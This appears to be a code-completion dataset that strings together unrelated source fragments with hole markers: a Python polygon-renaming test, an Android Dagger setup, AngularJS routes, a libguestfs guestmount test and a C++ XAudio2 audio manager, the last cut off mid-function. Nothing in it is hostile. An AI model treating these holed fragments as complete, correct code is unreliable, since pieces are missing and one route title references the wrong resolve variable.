' $\\rotatebox{-41.3}{\sffamily 128\\textdegree}$ B 138.7 deg 2.7\n'\
' $\\rotatebox{54.3}{\sffamily 32\\textdegree}$ C 234.3 deg 2.7\n'\
' $\\rotatebox{322.7}{\sffamily 256\\textdegree}$ D 322.7 deg 2.7\n'\
' "A" A 227.3 deg, font("sffamily")\n'\
' "B" B 318.7 deg, font("sffamily")\n'\
' "C" C 54.3 deg, font("sffamily")\n'\
' "D" D 142.7 deg, font("sffamily")\n'\
'end\n\n'\
'label\n'\
' B, A, D simple\n'\
' C, B, A simple\n'\
' D, C, B simple\n'\
' A, D, C simple\n'\
'end\n'
def test_p1_rename_errors(p1):
"""Check wrong arguments trigger exceptions when renaming."""
with pytest.raises(TypeError):
p1.rename(5678)
with pytest.raises(ValueError):
p1.rename('KJLIZ')
def test_p1_renamed(p1):
"""Check renaming Polygon is OK."""
p1.rename('YOGA')
assert p1.into_euk() == \
'box -0.1, -0.1, 3.8, 4.6\n\n'\
'A = point(0.5, 0.5)\n'\
'G = point(3, 1)\n'\
'O = point(3.2, 4)\n'\
'Y = point(0.8, 3)\n'\
'\n'\
'draw\n'\
' (A.G.O.Y)\n'\
' $\\rotatebox{11}{\sffamily 4~cm}$ A 11 - 12.7 deg 4.1\n'\
' $\\rotatebox{86}{\sffamily 3~cm}$ G 86 - 8.9 deg 4.9\n'\
' $\\rotatebox{23}{\sffamily 2~cm}$ O 203 - 12.2 deg 4.2\n'\
' $\\rotatebox{83}{\sffamily 6.5~cm}$ Y 263 - 12.9 deg 4.1\n'\
' $\\rotatebox{47.3}{\sffamily 64\\textdegree}$ A 47.3 deg 2.7\n'\
' $\\rotatebox{-41.3}{\sffamily 128\\textdegree}$ G 138.7 deg 2.7\n'\
' $\\rotatebox{54.3}{\sffamily 32\\textdegree}$ O 234.3 deg 2.7\n'\
' $\\rotatebox{322.7}{\sffamily 256\\textdegree}$ Y 322.7 deg 2.7\n'\
' "A" A 227.3 deg, font("sffamily")\n'\
' "G" G 318.7 deg, font("sffamily")\n'\
' "O" O 54.3 deg, font("sffamily")\n'\
' "Y" Y 142.7 deg, font("sffamily")\n'\
'end\n\n'\
'label\n'\
' G, A, Y simple\n'\
' O, G, A simple\n'\
' Y, O, G simple\n'\
' A, Y, O simple\n'\<|fim▁hole|><|fim▁end|> | 'end\n' |
<|file_name|>SampleApplication.java<|end_file_name|><|fim▁begin|>package com.gdgand.rxjava.rxjavasample.hotandcold;
import android.app.Application;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.component.ApplicationComponent;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.component.DaggerApplicationComponent;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.module.ApplicationModule;
import com.gdgand.rxjava.rxjavasample.hotandcold.di.module.DataModule;
public class SampleApplication extends Application {
private ApplicationComponent applicationComponent;
@Override
public void onCreate() {
super.onCreate();
applicationComponent = createComponent();
}
private ApplicationComponent createComponent() {
return DaggerApplicationComponent.builder()
.applicationModule(new ApplicationModule(this))
.dataModule(new DataModule())
.build();
}
public ApplicationComponent getApplicationComponent() {
return applicationComponent;
}
<|fim▁hole|><|fim▁end|> | } |
<|file_name|>tables.client.routes.js<|end_file_name|><|fim▁begin|>(function () {
'use strict';
angular
.module('tables')
.config(routeConfig);
routeConfig.$inject = ['$stateProvider'];
function routeConfig($stateProvider) {
$stateProvider
.state('tables', {
abstract: true,
url: '/tables',
template: '<ui-view/>'<|fim▁hole|> })
.state('tables.list', {
url: '',
templateUrl: 'modules/tables/client/views/list-tables.client.view.html',
controller: 'TablesListController',
controllerAs: 'vm',
data: {
pageTitle: 'Tables List'
}
})
.state('tables.create', {
url: '/create',
templateUrl: 'modules/tables/client/views/form-table.client.view.html',
controller: 'TablesController',
controllerAs: 'vm',
resolve: {
tableResolve: newTable
},
data: {
pageTitle : 'Tables Create'
}
})
.state('tables.edit', {
url: '/:tableId/edit',
templateUrl: 'modules/tables/client/views/form-table.client.view.html',
controller: 'TablesController',
controllerAs: 'vm',
resolve: {
tableResolve: getTable
},
data: {
roles: ['*'],
pageTitle: 'Edit Table {{ tableResolve.name }}'
}
})
.state('tables.view', {
url: '/:tableId',
templateUrl: 'modules/tables/client/views/view-table.client.view.html',
controller: 'TablesController',
controllerAs: 'vm',
resolve: {
tableResolve: getTable
},
data:{
pageTitle: 'Table {{ articleResolve.name }}'
}
});
}
getTable.$inject = ['$stateParams', 'TablesService'];
function getTable($stateParams, TablesService) {
return TablesService.get({
tableId: $stateParams.tableId
}).$promise;
}
newTable.$inject = ['TablesService'];
function newTable(TablesService) {
return new TablesService();
}
})();<|fim▁end|> | |
<|file_name|>guestmount.py<|end_file_name|><|fim▁begin|>import logging
import os
from autotest.client.shared import error, utils
from virttest import data_dir, utils_test
<|fim▁hole|> result = utils.run("umount -l %s" % mountpoint, ignore_status=True)
if result.exit_status:
logging.debug("Umount %s failed", mountpoint)
return False
logging.debug("Umount %s successfully", mountpoint)
return True
def run(test, params, env):
"""
Test libguestfs tool guestmount.
"""
vm_name = params.get("main_vm")
vm = env.get_vm(vm_name)
start_vm = "yes" == params.get("start_vm", "no")
if vm.is_alive() and not start_vm:
vm.destroy()
elif vm.is_dead() and start_vm:
vm.start()
# Create a file to vm with guestmount
content = "This is file for guestmount test."
path = params.get("gm_tempfile", "/home/gm_tmp")
mountpoint = os.path.join(data_dir.get_tmp_dir(), "mountpoint")
status_error = "yes" == params.get("status_error", "yes")
readonly = "no" == params.get("gm_readonly", "no")
special_mount = "yes" == params.get("gm_mount", "no")
vt = utils_test.libguestfs.VirtTools(vm, params)
vm_ref = params.get("gm_vm_ref")
is_disk = "yes" == params.get("gm_is_disk", "no")
# Automatically get disk if no disk specified.
if is_disk and vm_ref is None:
vm_ref = utils_test.libguestfs.get_primary_disk(vm)
if special_mount:
# Get root filesystem before test
params['libvirt_domain'] = params.get("main_vm")
params['gf_inspector'] = True
gf = utils_test.libguestfs.GuestfishTools(params)
roots, rootfs = gf.get_root()
gf.close_session()
if roots is False:
raise error.TestError("Can not get root filesystem "
"in guestfish before test")
logging.info("Root filesystem is:%s", rootfs)
params['special_mountpoints'] = [rootfs]
writes, writeo = vt.write_file_with_guestmount(mountpoint, path, content,
vm_ref)
if umount_fs(mountpoint) is False:
logging.error("Umount vm's filesystem failed.")
if status_error:
if writes:
if readonly:
raise error.TestFail("Write file to readonly mounted "
"filesystem successfully.Not expected.")
else:
raise error.TestFail("Write file with guestmount "
"successfully.Not expected.")
else:
if not writes:
raise error.TestFail("Write file to mounted filesystem failed.")<|fim▁end|> |
def umount_fs(mountpoint):
if os.path.ismount(mountpoint): |
<|file_name|>SGD_AudioManager.cpp<|end_file_name|><|fim▁begin|>/***********************************************************************\
| |
| File: SGD_AudioManager.cpp |
| Author: Douglas Monroe |
| Last Modified: 2014-03-10 |
| |
| Purpose: To load and play audio files |
| .wav - sound effect |
| .xwm - music |
| |
| © 2014 Full Sail, Inc. All rights reserved. The terms "Full Sail", |
| "Full Sail University", and the Full Sail University logo are |
| either registered service marks or service marks of Full Sail, Inc. |
| |
| Derived From: "XAudio2 Programming Guide" - MSDN |
| http://msdn.microsoft.com/en-us/library/hh405049%28v=vs.85%29.aspx |
| |
\***********************************************************************/
#include "stdafx.h"
#include "SGD_AudioManager.h"
// Uses assert for debug breaks
#include <cassert>
// Uses OutputDebugString for debug text
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <cstring>
// Uses std::multimap for storing voices
#include <map>
// Uses DirectInput to solve random memory-leak detection bug?!?
#define DIRECTINPUT_VERSION 0x0800
#include <dinput.h>
#pragma comment(lib, "dinput8.lib")
// Uses XAudio2 for audio
#include <XAudio2.h>
#pragma comment (lib, "dxguid.lib")
// Uses HandleManager for storing data
#include "SGD_HandleManager.h"
namespace SGD
{
namespace SGD_IMPLEMENTATION
{
//*************************************************************//
// AudioInfo
// - stores info for the audio file: name, buffer, reference count
struct AudioInfo
{
wchar_t* wszFilename; // file name
unsigned int unRefCount; // reference count
WAVEFORMATEXTENSIBLE format; // wave format (sample rate, etc)
XAUDIO2_BUFFER buffer; // buffer
XAUDIO2_BUFFER_WMA bufferwma; // additional buffer packets for xwm
float fVolume; // audio volume
};
//*************************************************************//
//*************************************************************//
// VoiceInfo
// - stores info for the source voice instance: audio handle, buffer, state
struct VoiceInfo
{
HAudio audio; // audio handle
IXAudio2SourceVoice* voice; // source voice
bool loop; // should repeat
bool paused; // currently paused
};
//*************************************************************//
//*************************************************************//
// AudioManager
// - concrete class for loading and playing audio files
// - only supports .wav and .xwm files
// - .wav files are categorized as 'Sound Effects'
// - .xwm files are categorized as 'Music'
// - uses IHandleManager to store audio data
class AudioManager : public SGD::AudioManager
{
public:
// SINGLETON
static AudioManager* GetInstance ( void );
static void DeleteInstance ( void );
virtual bool Initialize ( void ) override;
virtual bool Update ( void ) override;
virtual bool Terminate ( void ) override;
//enum class AudioCategory
//{
// Music, // *.xwm files
// SoundEffects, // *.wav files
//};
virtual int GetMasterVolume ( AudioGroup group ) override;
virtual bool SetMasterVolume ( AudioGroup group, int value ) override;
virtual HAudio LoadAudio ( const wchar_t* filename ) override;
virtual HAudio LoadAudio ( const char* filename ) override;
virtual HVoice PlayAudio ( HAudio handle, bool looping ) override;
virtual bool IsAudioPlaying ( HAudio handle ) override;
virtual bool StopAudio ( HAudio handle ) override;
virtual bool UnloadAudio ( HAudio& handle ) override;
virtual bool IsVoiceValid ( HVoice handle ) override;
virtual bool IsVoicePlaying ( HVoice handle ) override;
virtual bool PauseVoice ( HVoice handle, bool pause ) override;
virtual bool StopVoice ( HVoice& handle ) override;
virtual int GetVoiceVolume ( HVoice handle ) override;
virtual bool SetVoiceVolume ( HVoice handle, int value ) override;
virtual int GetAudioVolume ( HAudio handle ) override;
virtual bool SetAudioVolume ( HAudio handle, int value ) override;
private:
// SINGLETON
static AudioManager* s_Instance; // the ONE instance
AudioManager ( void ) = default; // Default constructor
virtual ~AudioManager ( void ) = default; // Destructor
AudioManager ( const AudioManager& ) = delete; // Copy constructor
AudioManager& operator= ( const AudioManager& ) = delete; // Assignment operator
// Wrapper Status
enum EAudioManagerStatus
{
E_UNINITIALIZED,
E_INITIALIZED,
E_DESTROYED
};
EAudioManagerStatus m_eStatus = E_UNINITIALIZED; // wrapper initialization status
IXAudio2* m_pXAudio = nullptr; // XAudio2 api
IXAudio2MasteringVoice* m_pMasterVoice = nullptr; // master voice
IXAudio2SubmixVoice* m_pSfxVoice = nullptr; // sound effects submix voice
IXAudio2SubmixVoice* m_pMusVoice = nullptr; // music submix voice
DWORD m_dwChannelMask = 0; // speaker configuration
UINT32 m_unChannels = 0; // speaker configuration count
typedef std::multimap< HAudio, HVoice > VoiceMap;
VoiceMap m_mVoices; // source voice map
HandleManager< AudioInfo > m_HandleManager; // data storage
HandleManager< VoiceInfo > m_VoiceManager; // voice storage
// AUDIO LOADING HELPER METHODS
static HRESULT FindChunk ( HANDLE hFile, DWORD fourcc, DWORD& dwChunkSize, DWORD& dwChunkDataPosition );
static HRESULT ReadChunkData ( HANDLE hFile, void* buffer, DWORD buffersize, DWORD bufferoffset );
static HRESULT LoadAudio ( const wchar_t* filename, WAVEFORMATEXTENSIBLE& wfx, XAUDIO2_BUFFER& buffer, XAUDIO2_BUFFER_WMA& bufferWMA );
// AUDIO REFERENCE HELPER METHOD
struct SearchInfo
{
const wchar_t* filename; // input
AudioInfo* audio; // output
HAudio handle; // output
};
static bool FindAudioByName( Handle handle, AudioInfo& data, SearchInfo* extra );
};
//*************************************************************//
} // namespace SGD_IMPLEMENTATION
//*****************************************************************//
// Interface singleton accessor
/*static*/ AudioManager* AudioManager::GetInstance( void )
{
// Return the implementation singleton (upcasted to interface)
return (SGD::AudioManager*)SGD_IMPLEMENTATION::AudioManager::GetInstance();
}
// Interface singleton destructor
/*static*/ void AudioManager::DeleteInstance( void )
{
// Deallocate the implementation singleton
return SGD_IMPLEMENTATION::AudioManager::DeleteInstance();
}
//*****************************************************************//
namespace SGD_IMPLEMENTATION
{
//*************************************************************//
// SINGLETON
// Instantiate static pointer to null (no instance yet)
/*static*/ AudioManager* AudioManager::s_Instance = nullptr;
// Singleton accessor
/*static*/ AudioManager* AudioManager::GetInstance( void )
{
// Allocate singleton on first use
if( AudioManager::s_Instance == nullptr )
AudioManager::s_Instance = new AudioManager;
// Return the singleton
return AudioManager::s_Instance;
}
// Singleton destructor
/*static*/ void AudioManager::DeleteInstance( void )
{
// Deallocate singleton
delete AudioManager::s_Instance;
AudioManager::s_Instance = nullptr;
}
//*************************************************************//
//*************************************************************//
// INITIALIZE
bool AudioManager::Initialize( void )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_UNINITIALIZED && "AudioManager::Initialize - wrapper has already been initialized" );
if( m_eStatus != E_UNINITIALIZED )
return false;
HRESULT hResult = S_OK;
// When using a COM object, the thread should be CoInitialized
CoInitializeEx( nullptr, COINIT_MULTITHREADED );
// HACK: Somehow creating DirectInput will allow memory leak detection?!?
IDirectInput8W* pDI_Hack;
DirectInput8Create( (HINSTANCE)GetModuleHandle( nullptr ), DIRECTINPUT_VERSION, IID_IDirectInput8W, (void**)&pDI_Hack, NULL);
pDI_Hack->Release();
// Attempt to create the XAudio2 interface
hResult = XAudio2Create( &m_pXAudio, 0 );
if( FAILED( hResult ) )
{
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Attempt to create the mastering voice
hResult = m_pXAudio->CreateMasteringVoice( &m_pMasterVoice );
if( FAILED( hResult ) )
{
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 master voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Get the speaker configuration
XAUDIO2_DEVICE_DETAILS details;
m_pXAudio->GetDeviceDetails( 0U, &details );
m_dwChannelMask = details.OutputFormat.dwChannelMask;
m_unChannels = details.OutputFormat.Format.nChannels;
// Attempt to create the sfx submix voice
hResult = m_pXAudio->CreateSubmixVoice( &m_pSfxVoice, m_unChannels, 44100, XAUDIO2_VOICE_USEFILTER );
if( FAILED( hResult ) )
{
m_pMasterVoice->DestroyVoice();
m_pMasterVoice = nullptr;
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 sfx submix voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Attempt to create the music submix voice
hResult = m_pXAudio->CreateSubmixVoice( &m_pMusVoice, m_unChannels, 44100, XAUDIO2_VOICE_USEFILTER );
if( FAILED( hResult ) )
{
m_pSfxVoice->DestroyVoice();
m_pSfxVoice = nullptr;
m_pMasterVoice->DestroyVoice();
m_pMasterVoice = nullptr;
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::Initialize - failed to initialize XAudio2 music submix voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Success!
m_eStatus = E_INITIALIZED;
return true;
}
//*************************************************************//
//*************************************************************//
// UPDATE
bool AudioManager::Update( void )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::Update - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Update the current voices
VoiceMap::iterator iter = m_mVoices.begin();
while( iter != m_mVoices.end() )
{
// Get the voice info from the handle manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
assert( info != nullptr && "AudioManager::Update - voice handle has expired" );
if( info == nullptr )
{
iter = m_mVoices.erase( iter );
continue;
}
// Has the voice ended?
XAUDIO2_VOICE_STATE state;
info->voice->GetState( &state );
if( state.BuffersQueued == 0 )
{
// Should it loop?
if( info->loop == true )
{
// Get the data from the Handle Manager
AudioInfo* data = m_HandleManager.GetData( iter->first );
assert( data != nullptr && "AudioManager::Update - voice refers to removed audio" );
if( data == nullptr )
{
// Remove the voice (could recycle it ...)
info->voice->DestroyVoice();
iter = m_mVoices.erase( iter );
continue;
}
// Play wav or wma?
if( data->bufferwma.PacketCount == 0 )
info->voice->SubmitSourceBuffer( &data->buffer );
else
info->voice->SubmitSourceBuffer( &data->buffer, &data->bufferwma );
}
else
{
// Remove the voice (could recycle it ...)
info->voice->DestroyVoice();
iter = m_mVoices.erase( iter );
continue;
}
}
++iter;
}
return true;
}
//*************************************************************//
//*************************************************************//
// TERMINATE
bool AudioManager::Terminate( void )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::Terminate - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Release all audio voices
for( VoiceMap::iterator iter = m_mVoices.begin(); iter != m_mVoices.end(); ++iter )
{
// Get the voice info from the handle manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
if( info == nullptr )
continue;
//info->voice->Stop();
//info->voice->FlushSourceBuffers();
info->voice->DestroyVoice();
}
m_mVoices.clear();
<|fim▁hole|> // Clear handles
m_VoiceManager.Clear();
m_HandleManager.Clear();
// Release submix & master voices
m_pMusVoice->DestroyVoice();
m_pMusVoice = nullptr;
m_pSfxVoice->DestroyVoice();
m_pSfxVoice = nullptr;
m_pMasterVoice->DestroyVoice();
m_pMasterVoice = nullptr;
// Release XAudio2
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
m_eStatus = E_DESTROYED;
return true;
}
//*************************************************************//
//*************************************************************//
// GET MASTER VOLUME
int AudioManager::GetMasterVolume( AudioGroup group )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::GetMasterVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return 0;
// Sanity-check the parameter
assert( (group == AudioGroup::Music || group == AudioGroup::SoundEffects) && "AudioManager::GetMasterVolume - invalid group" );
// Get the master volume from the submix voice
float fVolume = 0.0f;
if( group == AudioGroup::Music )
m_pMusVoice->GetVolume( &fVolume );
else //if( type == AudioGroup::SoundEffects )
m_pSfxVoice->GetVolume( &fVolume );
// Scale 0 -> +100 (account for floating point error)
return (int)(fVolume * 100.0f + 0.5f);
}
//*************************************************************//
//*************************************************************//
// SET MASTER VOLUME
bool AudioManager::SetMasterVolume( AudioGroup group, int value )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::SetMasterVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Sanity-check the parameter
assert( (group == AudioGroup::Music || group == AudioGroup::SoundEffects) && "AudioManager::SetMasterVolume - invalid group" );
//assert( value >= 0 && value <= 100 && "AudioManager::SetMasterVolume - volume must be between 0 -> 100" );
// Cap the range 0->100
if( value < 0 )
value = 0;
else if( value > 100 )
value = 100;
// Set the submix voice volume
HRESULT result = 0;
if( group == AudioGroup::Music )
result = m_pMusVoice->SetVolume( (float)( value / 100.0f ) );
else //if( group == AudioGroup::SoundEffects )
result = m_pSfxVoice->SetVolume( (float)( value / 100.0f ) );
return SUCCEEDED( result );
}
//*************************************************************//
//*************************************************************//
// LOAD AUDIO
HAudio AudioManager::LoadAudio( const wchar_t* filename )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::LoadAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return SGD::INVALID_HANDLE;
assert( filename != nullptr && filename[0] != L'\0' && "AudioManager::LoadAudio - invalid filename" );
if( filename == nullptr || filename[0] == L'\0' )
return SGD::INVALID_HANDLE;
// Attempt to find the audio in the Handle Manager
SearchInfo search = { filename, nullptr, SGD::INVALID_HANDLE };
m_HandleManager.ForEach( &AudioManager::FindAudioByName, &search );
// If it was found, increase the reference & return the existing handle
if( search.audio != NULL )
{
search.audio->unRefCount++;
return search.handle;
}
// Could not find audio in the Handle Manager
AudioInfo data = { };
ZeroMemory( &data.format, sizeof( data.format ) );
ZeroMemory( &data.buffer, sizeof( data.buffer ) );
ZeroMemory( &data.bufferwma, sizeof( data.bufferwma ) );
// Attempt to load from file
HRESULT hResult = LoadAudio( filename, data.format, data.buffer, data.bufferwma );
if( FAILED( hResult ) )
{
// MESSAGE
wchar_t wszBuffer[ 256 ];
_snwprintf_s( wszBuffer, 256, _TRUNCATE, L"!!! AudioManager::LoadAudio - failed to load audio file \"%ws\" (0x%X) !!!", filename, hResult );
OutputDebugStringW( wszBuffer );
OutputDebugStringA( "\n" );
MessageBoxW( GetActiveWindow(), wszBuffer, L"AudioManager::LoadAudio", MB_OK );
return SGD::INVALID_HANDLE;
}
// Audio loaded successfully
data.wszFilename = _wcsdup( filename );
data.unRefCount = 1;
data.fVolume = 1.0f;
// Store audio into the Handle Manager
return m_HandleManager.StoreData( data );
}
//*************************************************************//
//*************************************************************//
// LOAD AUDIO
HAudio AudioManager::LoadAudio( const char* filename )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::LoadAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return SGD::INVALID_HANDLE;
assert( filename != nullptr && filename[0] != '\0' && "AudioManager::LoadAudio - invalid filename" );
if( filename == nullptr || filename[0] == '\0' )
return SGD::INVALID_HANDLE;
// Convert the filename to UTF16
wchar_t widename[ MAX_PATH * 4 ];
int ret = MultiByteToWideChar( CP_UTF8, 0, filename, -1, widename, MAX_PATH * 4 );
if( ret == 0 )
{
// MESSAGE
char szBuffer[ 256 ];
_snprintf_s( szBuffer, 256, _TRUNCATE, "!!! AudioManager::LoadAudio - invalid filename \"%hs\" (0x%X) !!!", filename, GetLastError() );
OutputDebugStringA( szBuffer );
OutputDebugStringA( "\n" );
return SGD::INVALID_HANDLE;
}
// Use the UTF16 load
return LoadAudio( widename );
}
//*************************************************************//
//*************************************************************//
// PLAY AUDIO
HVoice AudioManager::PlayAudio( HAudio handle, bool looping )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::PlayAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return SGD::INVALID_HANDLE;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::PlayAudio - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return SGD::INVALID_HANDLE;
// Could create a VoicePool to recycle voices
// Voices can be reused for other audio files as long
// as they have the same samplerate and channels
// (the frequency rate may need to be modified)
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
assert( data != nullptr && "AudioManager::PlayAudio - handle has expired" );
if( data == nullptr )
return SGD::INVALID_HANDLE;
HRESULT hResult = S_OK;
// Create parameter (send descriptor) for submix voice
XAUDIO2_SEND_DESCRIPTOR desc = { 0 };
if( data->bufferwma.PacketCount == 0 )
desc.pOutputVoice = m_pSfxVoice;
else
desc.pOutputVoice = m_pMusVoice;
XAUDIO2_VOICE_SENDS sendlist = { 1, &desc };
// Create a voice with the proper wave format
IXAudio2SourceVoice* pVoice = nullptr;
hResult = m_pXAudio->CreateSourceVoice( &pVoice, (WAVEFORMATEX*)&data->format, 0U, 2.0f, nullptr, &sendlist );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PlayAudio - failed to create voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return SGD::INVALID_HANDLE;
}
// Use the XAUDIO2_BUFFER for the voice's source
if( data->bufferwma.PacketCount == 0 )
hResult = pVoice->SubmitSourceBuffer( &data->buffer );
else
hResult = pVoice->SubmitSourceBuffer( &data->buffer, &data->bufferwma );
if( FAILED( hResult ) )
{
pVoice->DestroyVoice();
pVoice = nullptr;
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PlayAudio - failed to submit source buffer (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return SGD::INVALID_HANDLE;
}
// Set the volume
pVoice->SetVolume( data->fVolume );
// Start the voice's thread
hResult = pVoice->Start( 0 );
if( FAILED( hResult ) )
{
pVoice->DestroyVoice();
pVoice = nullptr;
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PlayAudio - failed to start voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return SGD::INVALID_HANDLE;
}
// Store the voice
VoiceInfo info = { handle, pVoice, looping, false };
HVoice hv = m_VoiceManager.StoreData( info );
if( hv != SGD::INVALID_HANDLE )
m_mVoices.insert( VoiceMap::value_type( handle, hv ) );
return hv;
}
//*************************************************************//
//*************************************************************//
// IS AUDIO PLAYING
bool AudioManager::IsAudioPlaying( HAudio handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::IsAudioPlaying - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::IsAudioPlaying - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Find all voices with this handle
VoiceMap::_Paircc range = m_mVoices.equal_range( handle );
for( VoiceMap::const_iterator iter = range.first; iter != range.second; ++iter )
{
// Check if there are any active voices for this handle
if( IsVoicePlaying( iter->second ) == true )
return true;
}
return false;
}
//*************************************************************//
//*************************************************************//
// STOP AUDIO
bool AudioManager::StopAudio( HAudio handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::StopAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::StopAudio - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Find all voices with this handle
VoiceMap::_Paircc range = m_mVoices.equal_range( handle );
for( VoiceMap::const_iterator iter = range.first; iter != range.second; ++iter )
{
// Get the voice info from the Handle Manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
if( info == nullptr )
continue;
// Destroy (or recycle) the voice
info->voice->DestroyVoice();
info->voice = nullptr;
// Remove the voice from the HandleManager
m_VoiceManager.RemoveData( iter->second, nullptr );
}
// Remove the voices from the active map
m_mVoices.erase( handle );
return true;
}
//*************************************************************//
//*************************************************************//
// UNLOAD AUDIO
bool AudioManager::UnloadAudio( HAudio& handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::UnloadAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Quietly ignore bad handles
if( m_HandleManager.IsHandleValid( handle ) == false )
{
handle = SGD::INVALID_HANDLE;
return false;
}
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
if( data == nullptr )
return false;
// Release a reference
data->unRefCount--;
// Is this the last reference?
if( data->unRefCount == 0 )
{
// Stop the audio
StopAudio( handle );
// Deallocate the audio buffers
delete[] data->buffer.pAudioData;
delete[] data->bufferwma.pDecodedPacketCumulativeBytes;
// Deallocate the name
delete[] data->wszFilename;
// Remove the audio info from the handle manager
m_HandleManager.RemoveData( handle, nullptr );
}
// Invalidate the handle
handle = INVALID_HANDLE;
return true;
}
//*************************************************************//
//*************************************************************//
// IS VOICE VALID
bool AudioManager::IsVoiceValid( HVoice handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::IsVoicePlaying - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Validate the handle
return m_VoiceManager.IsHandleValid( handle );
}
//*************************************************************//
//*************************************************************//
// IS VOICE PLAYING
bool AudioManager::IsVoicePlaying( HVoice handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::IsVoicePlaying - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::IsVoicePlaying - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::IsVoicePlaying - handle has expired" );
if( data == nullptr )
return false;
// Is the voice playing?
return !data->paused;
}
//*************************************************************//
//*************************************************************//
// PAUSE VOICE
bool AudioManager::PauseVoice( HVoice handle, bool pause )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::PauseVoice - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::PauseVoice - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::PauseVoice - handle has expired" );
if( data == nullptr )
return false;
// Stop the voice?
if( pause == true )
{
HRESULT hResult = data->voice->Stop( 0 );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PauseVoice - failed to stop voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
}
else
{
HRESULT hResult = data->voice->Start( 0 );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PauseVoice - failed to start voice (0x%X) !!!\n", hResult );
